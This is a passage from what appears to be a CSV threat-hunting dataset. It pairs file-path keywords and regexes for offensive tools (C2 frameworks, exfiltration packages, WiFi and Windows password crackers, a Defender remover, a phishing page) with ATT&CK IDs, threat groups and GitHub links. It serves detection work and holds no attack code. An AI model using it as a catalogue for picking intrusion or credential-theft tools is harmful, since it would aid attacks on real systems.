Escalation","https://github.com/sailay1996/WerTrigger","1","1","N/A","N/A","9","3","221","36","2022-05-10T17:36:49Z","2020-05-20T11:27:56Z","12559" "*/WfpTokenDup.exe*",".{0,1000}\/WfpTokenDup\.exe.{0,1000}","offensive_tool_keyword","PrivFu","Kernel mode WinDbg extension and PoCs for token privilege investigation.","T1016 - T1018 - T1098 - T1134 - T1055 - T1053 - T1059 - T1035 - T1547.001 - T1547.004
- T1548.001","TA0007 - TA0008 - TA0002 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","1","N/A","N/A","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","12560" "*/wfuzz *",".{0,1000}\/wfuzz\s.{0,1000}","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Reconnaissance","https://github.com/xmendez/wfuzz","1","0","#linux","N/A","9","10","6148","1384","2024-08-18T01:36:10Z","2014-10-22T21:23:49Z","12561" "*/whatlicense.git*",".{0,1000}\/whatlicense\.git.{0,1000}","offensive_tool_keyword","whatlicense","WinLicense key extraction via Intel PIN","T1056 - T1056.001 - T1518 - T1518.001","TA0005 - TA0006","N/A","N/A","Exploitation tool","https://github.com/charlesnathansmith/whatlicense","1","1","N/A","N/A","6","2","101","25","2024-04-09T05:30:56Z","2023-07-10T11:57:44Z","12562" "*/WheresMyImplant/*",".{0,1000}\/WheresMyImplant\/.{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","12563" "*/Whisker.exe*",".{0,1000}\/Whisker\.exe.{0,1000}","offensive_tool_keyword","ObfuscatedSharpCollection","obfuscated Sharp Offensive tools","T1003 - T1059 - T1087 - T1555 - T1078 - T1213 - T1569 - T1548 - T1071 - T1566","TA0006 - TA0005 - TA0003 - TA0002 - TA0004 - TA0008","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/ObfuscatedSharpCollection","1","1","N/A","N/A","10","3","206","30","2025-04-18T03:11:19Z","2023-05-14T18:36:15Z","12564" "*/Whisker.exe*",".{0,1000}\/Whisker\.exe.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active 
Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Whisker","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","12565" "*/Whisker.exe*",".{0,1000}\/Whisker\.exe.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","1","N/A","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","12566" "*/Whisker.exe*",".{0,1000}\/Whisker\.exe.{0,1000}","offensive_tool_keyword","Whisker","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","1","N/A","Whisker","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","12567" "*/whoami.py*",".{0,1000}\/whoami\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security 
of large Active Directory networks.","T1110 - T1135 - T1047 - T1078 - T1087 - T1021","TA0006 - TA0007 - TA0003 - TA0008 - TA0005","N/A","N/A","Exploitation tool","https://github.com/Pennyw0rth/NetExec","1","1","N/A","N/A","10","10","4066","459","2025-04-20T00:08:29Z","2023-09-08T15:36:00Z","12568" "*/WhoAmI.task*",".{0,1000}\/WhoAmI\.task.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/cobbr/Covenant","1","1","N/A","N/A","10","10","4363","783","2024-07-18T17:25:35Z","2019-02-07T15:55:18Z","12569" "*/whois-domain.nse*",".{0,1000}\/whois\-domain\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12570" "*/whois-ip.nse*",".{0,1000}\/whois\-ip\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","12571" "*/Widgets/LootWidget.*",".{0,1000}\/Widgets\/LootWidget\..{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","Dispossessor","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","N/A","10","10","7449","1050","2025-01-23T23:42:35Z","2022-09-11T13:21:16Z","12572" "*/wifi_hopping.*",".{0,1000}\/wifi_hopping\..{0,1000}","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/bettercap/bettercap","1","1","#linux","network exploitation tool","10","10","17525","1526","2025-04-16T22:28:20Z","2018-01-07T15:30:41Z","12573" "*/WiFiBroot*",".{0,1000}\/WiFiBroot.{0,1000}","offensive_tool_keyword","wifibroot","A Wireless (WPA/WPA2) Pentest/Cracking tool. Captures & Crack 4-way handshake and PMKID key. Also. 
supports a deauthentication/jammer mode for stress testing","T1018 - T1040 - T1095 - T1113 - T1210 - T1437 - T1499 - T1557 - T1562 - T1573","TA0001 - TA0002 - TA0006 - TA0007 - TA0011","N/A","N/A","Credential Access","https://github.com/hash3liZer/WiFiBroot","1","1","N/A","network exploitation tool","N/A","10","1008","182","2021-01-15T09:07:36Z","2018-07-30T10:57:22Z","12574" "*/wifidump.c*",".{0,1000}\/wifidump\.c.{0,1000}","offensive_tool_keyword","cobaltstrike","Various Cobalt Strike BOFs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - 
Sandworm","C2","https://github.com/rvrsh3ll/BOF_Collection","1","1","N/A","N/A","10","10","635","57","2022-10-16T13:57:18Z","2020-07-16T18:24:55Z","12575" "*/WifiKeys.dll*",".{0,1000}\/WifiKeys\.dll.{0,1000}","offensive_tool_keyword","Xworm","Malware with wide range of capabilities ranging from RAT to ransomware","T1562 - T1547 - T1056 - T1125 - T1496 - T1486 - T1219 - T1567 - T1564 - T1027","TA0005 - TA0003 - TA0009 - TA0040 - TA0002 - TA0006 - TA0010 - TA0004 - TA0007 - TA0008 - TA0011","N/A","N/A","Malware","https://github.com/guessthatname99/XWorm-RAT-V2.1","1","1","N/A","N/A","10","","N/A","","","","12576" "*/wifiPayload/client.py*",".{0,1000}\/wifiPayload\/client\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","12577" "*/wifiPayload/server.py*",".{0,1000}\/wifiPayload\/server\.py.{0,1000}","offensive_tool_keyword","PyExfil","A Python Package for Data Exfiltration","T1041 - T1567 - T1027","TA0011 - TA0009 - TA0002","N/A","N/A","Data Exfiltration","https://github.com/ytisf/PyExfil","1","1","N/A","N/A","10","8","782","141","2024-05-07T07:58:02Z","2014-11-27T19:06:24Z","12578" "*/wifite -c *",".{0,1000}\/wifite\s\-c\s.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/derv82/wifite2","1","0","N/A","network exploitation tool","N/A","10","6838","1403","2024-08-20T12:34:38Z","2015-05-30T06:09:52Z","12579" "*/wifite2*",".{0,1000}\/wifite2.{0,1000}","offensive_tool_keyword","wifite2","This repo is a complete re-write of wifite. 
a Python script for auditing wireless networks.Run wifite. select your targets. and Wifite will automatically start trying to capture or crack the password.","T1590 - T1170 - T1595","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/derv82/wifite2","1","1","N/A","network exploitation tool","N/A","10","6838","1403","2024-08-20T12:34:38Z","2015-05-30T06:09:52Z","12580" "*/wikipedia_fr.7z*",".{0,1000}\/wikipedia_fr\.7z.{0,1000}","offensive_tool_keyword","wordlists","Various wordlists FR & EN - Cracking French passwords","T1110.001","TA0006","N/A","N/A","Credential Access","https://github.com/clem9669/wordlists","1","1","N/A","N/A","N/A","3","280","45","2025-04-22T14:34:10Z","2020-10-21T14:37:53Z","12581" "*/wikiZ/RedGuard*",".{0,1000}\/wikiZ\/RedGuard.{0,1000}","offensive_tool_keyword","RedGuard","RedGuard is a C2 front flow control tool.Can avoid Blue Teams.AVs.EDRs check.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","FIN7 - APT19 - menuPass - Threat Group-3390 - FIN6 - APT37 - Wizard Spider - TA505 - Cobalt Group - DarkHydrus - APT41 - Mustang Panda - Earth Lusca - APT29 - LuminousMoth - APT32 - Chimera - Leviathan - CopyKittens - Aquatic Panda - Indrik 
Spider","C2","https://github.com/wikiZ/RedGuard","1","1","N/A","N/A","10","10","1466","204","2024-08-20T17:43:35Z","2022-05-08T04:02:33Z","12582" "*/win/Tor/tor.exe*",".{0,1000}\/win\/Tor\/tor\.exe.{0,1000}","offensive_tool_keyword","tor","Tor is a python based module for using tor proxy/network services on windows - osx - linux with just one click.","T1090 - T1134 - T1188 - T1307 - T1497 - T1560","TA0005 - TA0010 - TA0011","N/A","Dispossessor - APT28 - APT29 - Leviathan","Defense Evasion","https://github.com/r0oth3x49/Tor","1","1","N/A","N/A","N/A","2","156","42","2018-04-21T10:55:00Z","2016-09-22T11:22:33Z","12583" "*/Win7ElevateDll*",".{0,1000}\/Win7ElevateDll.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12584" "*/WinBruteLogon*",".{0,1000}\/WinBruteLogon.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","N/A","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","12586" "*/win-brute-logon*",".{0,1000}\/win\-brute\-logon.{0,1000}","offensive_tool_keyword","win-brute-logon","Bruteforce cracking tool for windows users","T1110 - T1110.001 - T1110.002","TA0008 - TA0006 - TA0005","N/A","N/A","Credential Access","https://github.com/DarkCoderSc/win-brute-logon","1","1","N/A","N/A","N/A","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","12587" "*/win-brute-logon.git*",".{0,1000}\/win\-brute\-logon\.git.{0,1000}","offensive_tool_keyword","win-brute-logon","Crack any Microsoft Windows users password without any privilege (Guest account included)","T1110.001 - T1078.001 - T1187 - T1055 - T1547 - T1003.005","TA0006 - TA0008 - TA0005","N/A","N/A","Credential Access","https://github.com/PhrozenIO/win-brute-logon","1","1","N/A","N/A","7","10","1138","191","2023-11-09T10:37:58Z","2020-05-14T21:46:50Z","12588" "*/WinBruteLogon.zip*",".{0,1000}\/WinBruteLogon\.zip.{0,1000}","offensive_tool_keyword","redpill","Assist reverse 
tcp shells in post-exploration tasks","T1082 - T1016 - T1049 - T1057 - T1489 - T1070 - T1562 - T1563 - T1119 - T1518 - T1602 - T1530 - T1113 - T1125 - T1105 - T1133 - T1056 - T1114 - T1539 - T1552 - T1214 - T1110 - T1040 - T1436 - T1068 - T1088 - T1564 - T1112 - T1547 - T1574 - T1204 - T1215 - T1046 - T1557 - T1136 - T1059 - T1127 - T1555 - T1548 - T1115 - T1003","TA0007 - TA0003 - TA0005 - TA0009 - TA0002 - TA0006 - TA0004 - TA0010 - TA0011","N/A","N/A","Exploitation tool","https://github.com/r00t-3xp10it/redpill","1","1","N/A","N/A","10","3","218","52","2024-03-19T15:03:16Z","2021-02-20T23:59:07Z","12589" "*/windapsearch.git*",".{0,1000}\/windapsearch\.git.{0,1000}","offensive_tool_keyword","windapsearch","Python script to enumerate users - groups and computers from a Windows domain through LDAP queries","T1087.002 - T1018 - T1069.002","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/ropnop/windapsearch","1","1","N/A","AD Enumeration","7","9","866","154","2022-04-20T07:40:42Z","2016-08-10T21:43:30Z","12590" "*/windapsearch.py*",".{0,1000}\/windapsearch\.py.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","1","N/A","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","12591" "*/windapsearch_*.txt*",".{0,1000}\/windapsearch_.{0,1000}\.txt.{0,1000}","offensive_tool_keyword","linWinPwn","linWinPwn is a bash script that automates a number of Active Directory Enumeration and Vulnerability checks","T1087.002 - T1018 - T1069.002 - T1046 - T1083 - T1016","TA0007 - TA0009 - TA0003 - TA0002 - TA0005","N/A","Black Basta","Discovery","https://github.com/lefayjey/linWinPwn","1","1","#linux","N/A","10","10","1953","283","2025-04-15T14:51:50Z","2021-12-16T22:13:10Z","12592" "*/WindDef_WebInstall.hta*",".{0,1000}\/WindDef_WebInstall\.hta.{0,1000}","offensive_tool_keyword","nishang","Antak is a webshell written in ASP.Net 
which utilizes PowerShell. Antak is a part of Nishang and updates can be found here: https://github.com/samratashok/nishang","T1059.001 - T1086 - T1059.003 - T1105 - T1117 - T1059.005","TA0002 - TA0005 - TA0011 - TA0007 - TA0010","N/A","APT27 - APT32 - FANCY BEAR","Framework","https://github.com/samratashok/nishang/tree/master/Antak-WebShell","1","1","N/A","N/A","N/A","10","9144","2487","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z","12593" "*/windows/dcerpc*",".{0,1000}\/windows\/dcerpc.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12594" "*/windows/gather/netripper*",".{0,1000}\/windows\/gather\/netripper.{0,1000}","offensive_tool_keyword","NetRipper","NetRipper - Smart traffic sniffing for penetration testers","T1173 - T1557 - T1573.001 - T1056.001","TA0009 - TA0010","N/A","N/A","Sniffing & Spoofing","https://github.com/NytroRST/NetRipper","1","1","N/A","N/A","10","10","1368","318","2022-06-17T21:08:54Z","2015-07-14T20:31:04Z","12595" "*/windows_autologin.rb*",".{0,1000}\/windows_autologin\.rb.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12596" "*/windows_downdate.py*",".{0,1000}\/windows_downdate\.py.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","1","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","12597" "*/Windows_MSKSSRV_LPE_CVE-2023-36802.git*",".{0,1000}\/Windows_MSKSSRV_LPE_CVE\-2023\-36802\.git.{0,1000}","offensive_tool_keyword","Windows_MSKSSRV_LPE_CVE-2023-36802","Complete exploit works on vulnerable Windows 11 22H2 systems CVE-2023-36802 Local Privilege Escalation POC","T1068 - T1548.001","TA0004 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/chompie1337/Windows_MSKSSRV_LPE_CVE-2023-36802","1","1","N/A","N/A","10","2","161","38","2023-10-10T17:44:17Z","2023-10-09T17:32:15Z","12598" "*/windows_x64_admin.exe*",".{0,1000}\/windows_x64_admin\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - 
TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","12599" "*/windows_x64_agent.exe*",".{0,1000}\/windows_x64_agent\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","12600" "*/windows_x86_admin.exe*",".{0,1000}\/windows_x86_admin\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","12601" "*/windows_x86_agent.exe*",".{0,1000}\/windows_x86_agent\.exe.{0,1000}","offensive_tool_keyword","stowaway","Stowaway -- Multi-hop Proxy Tool for pentesters","T1021 - T1090 - T1071 - T1573","TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/ph4ntonn/Stowaway","1","0","N/A","N/A","10","10","2989","422","2025-04-05T14:48:38Z","2019-11-15T03:25:50Z","12602" "*/windows-defender-remover.git*",".{0,1000}\/windows\-defender\-remover\.git.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","12603" "*/windows-defender-remover/releases/download/*",".{0,1000}\/windows\-defender\-remover\/releases\/download\/.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense 
Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","12604" "*/windows-defender-remover/tarball/*",".{0,1000}\/windows\-defender\-remover\/tarball\/.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","12605" "*/windows-defender-remover/zipball/*",".{0,1000}\/windows\-defender\-remover\/zipball\/.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense Evasion","https://github.com/ionuttbara/windows-defender-remover","1","1","N/A","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","12606" "*/WindowsDowndate.git*",".{0,1000}\/WindowsDowndate\.git.{0,1000}","offensive_tool_keyword","WindowsDowndate","A tool that takes over Windows Updates to craft custom downgrades and expose past fixed vulnerabilities","T1072 - T1486 - T1505.002 - T1495 - T1499.004","TA0005 - TA0004 - TA0003 ","N/A","N/A","Defense Evasion","https://github.com/SafeBreach-Labs/WindowsDowndate","1","1","N/A","N/A","10","7","663","88","2024-10-26T10:18:49Z","2024-01-08T19:42:47Z","12607" "*/windows-login-phish*",".{0,1000}\/windows\-login\-phish.{0,1000}","offensive_tool_keyword","windows-login-phish","Windows Login Phishing page This is a windows machine login page designed using HTML CSS and JS. 
This can be used for red teaming or cybersecurity awareness related purposes","T1566","N/A","N/A","N/A","Phishing","https://github.com/CipherKill/windows-login-phish","1","1","N/A","N/A","N/A","1","17","6","2022-03-25T05:49:01Z","2022-03-13T20:02:15Z","12608" "*/windows-lpe-template*",".{0,1000}\/windows\-lpe\-template.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","FANCY BEAR - EMBER BEAR - Sandworm - Turla - MAZE - LockBit - Bassterlord* - Conti - Hive - Fog - Black Basta - MoneyTaker - INDRIK SPIDER - APT39 - GOLD DUPONT - Common Raven","Framework","https://github.com/rapid7/metasploit-framework","1","1","N/A","N/A","10","10","35400","14272","2025-04-22T20:14:59Z","2011-08-30T06:13:20Z","12609" "*/Windows-Passwords.ps1*",".{0,1000}\/Windows\-Passwords\.ps1.{0,1000}","offensive_tool_keyword","WLAN-Windows-Passwords","Opens PowerShell hidden - grabs wlan passwords - saves as a cleartext in a variable and exfiltrates info via Discord Webhook.","T1056.005 - T1552.001 - T1119 - T1071.001","TA0004 - TA0006 - TA0010 - TA0040","N/A","N/A","Credential 
